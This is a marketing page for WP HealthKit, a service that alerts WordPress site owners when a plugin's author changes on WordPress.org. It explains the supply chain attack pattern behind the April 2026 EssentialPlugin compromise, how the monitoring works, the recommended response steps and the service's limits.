Know when a plugin changes hands — before the backdoor activates
The April 2026 EssentialPlugin attack compromised 30+ plugins purchased on Flippa. Backdoor code sat dormant for 8 months. WP HealthKit monitors plugin author changes on WordPress.org and alerts you the moment ownership shifts.
How supply chain attacks work
The April 2026 EssentialPlugin attack followed a pattern that repeats across every major WordPress supply chain incident. Five steps. Eight months from purchase to payload.
Plugin sold on Flippa or marketplace
A legitimate, trusted plugin is acquired by a new owner. The transaction is public — but no one is watching.
New owner modifies the code
A malicious payload is added, often obfuscated. It passes through standard automated checks because it resembles legitimate code.
Update pushed to WordPress.org
The plugin update looks like any other release. WordPress.org review sees no obvious violation. The update is approved.
Sites auto-update — backdoor is live
Any site with auto-updates enabled, or any site owner who updates manually, now runs the compromised code across their production environment.
Payload activates weeks or months later
In the April 2026 EssentialPlugin attack, backdoor code sat dormant for 8 months before activating against 20,000+ sites simultaneously.
How WP HealthKit detects it
Daily heartbeat sync
The companion plugin syncs your installed plugin inventory with WP HealthKit once per day — plugin slugs, versions, and current author data.
WordPress.org API polling
WP HealthKit queries the WordPress.org plugins API daily for each plugin in your inventory, comparing the current author username against the last known value.
Author change detected
If the author username differs from the last recorded value, an alert fires immediately — in-app notification and email.
Plugin closure detected
If a plugin is removed or closed on WordPress.org (common after a security incident), you are alerted immediately regardless of author data.
What you see in the dashboard
Every connected site has a Supply Chain panel showing the author status of each installed plugin. Green when all clear. Orange with detail when something changes.
- Plugin name and current installation count
- Previous author username and new author username
- Date the change was detected
- Direct link to the plugin changelog on WordPress.org
What to do when you get an alert
An author change is a signal to investigate — not necessarily a confirmation of compromise. Here is the recommended response flow.
Review the changelog
Open the plugin changelog on WordPress.org. Look for unexplained file additions or vague release notes.
Check recent commits
If the plugin has a public SVN log, scan recent commits for obfuscated code, base64 strings, or external curl calls.
Assess the risk
Not every ownership change is malicious. Legitimate acquisitions happen. Use context: is this a reputable buyer or an anonymous account?
Deactivate if suspicious
WP HealthKit does not remove plugins automatically. If you see suspicious code, deactivate and remove before any payload can activate.
Honest limitations
- Only detects changes on WordPress.org. Private and commercial plugins have no public API and cannot be monitored.
- Detects author changes, not necessarily malicious changes. False positives are possible when plugins are legitimately acquired.
- Requires the WP HealthKit companion plugin to be installed and connected to your site.
- Daily polling means a short window exists between a change being made and detection.
Connect your first site and enable supply chain monitoring
The companion plugin takes two minutes to install. Author change alerts are on by default.